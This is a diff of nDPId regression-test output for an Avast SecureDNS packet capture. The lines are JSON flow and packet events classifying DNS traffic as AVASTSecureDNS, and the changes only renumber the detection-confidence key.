00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1625320207133,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625320207133,"pkt":"eJS0JASgYDjgxTWgCABFAABDS9IAAH8RU2DAqAJktdYjld0FAbsALycJUJMBAAABAAAAAAAAATIJc2VjVVJlZG5TBUF2YXNUA2NvTQAAEAAB"} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320207133,"flow_last_seen":1625320207133,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":9,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320207133,"flow_last_seen":1625320207133,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320207133,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1625320207252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625320207252,"pkt":"YDjgxTWgeJS0JASgCABFAADMnAoAADMRTp+11iOVwKgCZAG73QUAuJ93UJOBgAABAAEAAAAAATIJc2VjVVJlZG5TBUF2YXNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320209063,"flow_last_seen":1625320209063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320209063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1625320209063,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625320209063,"pkt":"eJS0JASgYDjgxTWgCABFAABDS9YAAH8RU1zAqAJktdYjld29AbsAL+vXy0wBAAABAAAAAAAAATIJU2VjdVJFRG5TBWFWYVNUA0NvTQAAEAAB"} 
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320209063,"flow_last_seen":1625320209063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320209063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625320209063,"flow_last_seen":1625320209063,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625320209063,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1625320209184,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625320209184,"pkt":"YDjgxTWgeJS0JASgCABFAADMnWsAADMRTT611iOVwKgCZAG73b0AuGRGy0yBgAABAAEAAAAAATIJU2VjdVJFRG5TBWFWYVNUA0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241699450,"flow_last_seen":1625241699572,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241714666,"flow_last_seen":1625241714787,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241701462,"flow_last_seen":1625241701583,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241699450,"flow_last_seen":1625241699572,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61201,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241714666,"flow_last_seen":1625241714787,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":62775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625241701462,"flow_last_seen":1625241701583,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625320209184,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":60835,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":13,"packets-processed":12,"total-skipped-flows":0,"total-l4-payload-len":1290,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":6,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":6,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":33,"global_ts_msec":1625321673727} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321673727,"flow_last_seen":1625321673727,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1625321673727,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625321673727,"pkt":"eJS0JASgYDjgxTWgCABFAABDS9wAAH8RU1bAqAJktdYjlcWVAbsAL1g+dw4BAAABAAAAAAAAATIJc2VDdXJFRE5TBUFWQXN0A0NvTQAAEAAB"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321673727,"flow_last_seen":1625321673727,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":13,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321673727,"flow_last_seen":1625321673727,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321673727,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":50581,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1625321673848,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625321673848,"pkt":"YDjgxTWgeJS0JASgCABFAADMus8AADIRMNq11iOVwKgCZAG7xZUAuNCsdw6BgAABAAEAAAAAATIJc2VDdXJFRE5TBUFWQXN0A0NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321675283,"flow_last_seen":1625321675283,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321675283,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1625321675283,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625321675283,"pkt":"eJS0JASgYDjgxTWgCABFAABDS98AAH8RU1PAqAJktdYjle6zAbsAL9OvEl8BAAABAAAAAAAAATIJU0VDdVJFZE5zBWFWYXNUA0NPTQAAEAAB"} 
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321675283,"flow_last_seen":1625321675283,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321675283,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625321675283,"flow_last_seen":1625321675283,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625321675283,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":61107,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00685{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":16,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1625321675403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625321675403,"pkt":"YDjgxTWgeJS0JASgCABFAADMuxcAADMRL5K11iOVwKgCZAG77rMAuEweEl+BgAABAAEAAAAAATIJU0VDdVJFZE5zBWFWYXNUA0NPTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} -00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320207133,"flow_last_seen":1625320207252,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625321675403,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
-00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320209063,"flow_last_seen":1625320209184,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625321675403,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320207133,"flow_last_seen":1625320207252,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625321675403,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56581,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
+00696{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1625320209063,"flow_last_seen":1625320209184,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":176,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1625321675403,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":56765,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 00564{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","packets-captured":17,"packets-processed":16,"total-skipped-flows":0,"total-l4-payload-len":1720,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":8,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":8,"total-idle-flows":6,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":44,"global_ts_msec":1625395217252} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217252,"flow_last_seen":1625395217252,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1625395217252,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625395217252,"pkt":"eJS0JASgYDjgxTWgCABFAABDKckAAH8RdWnAqAJktdYjlf26AbsAL3dTP5QBAAABAAAAAAAAATIJc0VjdVJlZE5zBUFWQVNUA2NvTQAAEAAB"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217252,"flow_last_seen":1625395217252,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217252,"flow_last_seen":1625395217252,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217252,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":64954,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00687{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1625395217373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625395217373,"pkt":"YDjgxTWgeJS0JASgCABFAADMg3oAADIRaC+11iOVwKgCZAG7\/boAuO\/BP5SBgAABAAEAAAAAATIJc0VjdVJlZE5zBUFWQVNUA2NvTQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1625395217373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1625395217373,"pkt":"eJS0JASgYDjgxTWgCABFAABDKcUAAH8RdW3AqAJktdYjlejlAbsAL0m4oeQBAAABAAAAAAAAATIJc0VjVXJlRE5TBWF2QVNUA2NPbQAAEAAB"} 
-00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":19,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1625395217373,"flow_last_seen":1625395217373,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1625395217373,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"181.214.35.149","src_port":59621,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"AVASTSecureDNS","breed":"Safe","category":"Network"}} 
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":20,"source":"avast_securedns.pcapng","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1625395217373,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":218,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":218,"pkt_l4_len":184,"thread_ts_msec":1625395217373,"pkt":"YDjgxTWgeJS0JASgCABFAADMf00AADMRa1y11iOVwKgCZAG76OUAuMImoeSBgAABAAEAAAAAATIJc0VjVXJlRE5TBWF2QVNUA2NPbQAAEAABwAwAEAABAAAAAAB9fEROU0MAAQAAdbGG79HauHsEle6YB50xeKMwK8SYUwo5qiWilpDIHq4IRyPqRT3IPG5jxpboE0lko1AuVkiWEeUR9\/u646E\/BRo\/+UHxjIi4wlQScksPLarZO+PfTGW44OCbGa1Eo85vGj\/5QfGMiLgwMDAxXpWkwXFhp8E="} 